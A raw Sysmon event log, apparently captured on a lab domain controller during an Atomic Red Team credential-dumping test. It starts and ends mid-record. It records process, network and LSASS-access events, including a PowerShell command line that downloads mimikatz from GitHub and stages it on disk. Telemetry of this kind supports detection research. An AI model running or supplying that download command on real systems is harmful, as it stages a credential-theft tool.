21:09:58.464{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025053Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.463{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest' $request = [System.Net.WebRequest]::Create($url) $response = $request.GetResponse() $realTagUrl = $response.ResponseUri.OriginalString $version = $realTagUrl.split('/')[-1] $fileName = 'mimikatz_trunk.zip' [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName Invoke-WebRequest $realDownloadUrl -OutFile \""$env:TEMP\Mimi.zip\"" Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force New-Item -ItemType Directory (Split-Path C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe) -Force | Out-Null Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe -Force} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025052Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.448{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025051Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.448{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025050Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.448{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD6255F852A73C8AFE401A4C7FE1C5D4,SHA256=B2B7BC295CDE8A78311161CC060FACCA26DE9916B6C41F14FFD2D3F02125F64F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025049Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.432{4DB9351A-A326-60D3-3806-00000000CF01}5332ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025048Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.370{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025047Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.370{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025046Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.339{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025045Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.339{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000025044Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:09:58.307{4DB9351A-A326-60D3-3806-00000000CF01}5332\PSHost.132689561982434617.5332.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 354300x800000000000000025043Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:56.173{4DB9351A-A323-60D3-3406-00000000CF01}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61528-false185.199.109.133cdn-185-199-109-133.github.com443https 354300x800000000000000025042Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.968{4DB9351A-A323-60D3-3406-00000000CF01}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61527-false192.30.255.113lb-192-30-255-113-sea.github.com443https 23542300x800000000000000025041Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.292{4DB9351A-A326-60D3-3806-00000000CF01}5332ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_cgytkfmp.aas.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025040Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.292{4DB9351A-A326-60D3-3806-00000000CF01}5332ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_u5a3ccej.52v.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025039Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.292{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_u5a3ccej.52v.ps12021-06-23 21:09:58.292 10341000x800000000000000025038Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.276{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025037Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.245{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025036Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.245{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025035Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.229{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025034Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.229{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025033Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.229{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025032Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.229{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025031Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.229{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025030Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.229{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025029Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.243{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000025028Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.167{4DB9351A-A325-60D3-3706-00000000CF01}6172ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025027Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.120{4DB9351A-A325-60D3-3606-00000000CF01}70963256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025026Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 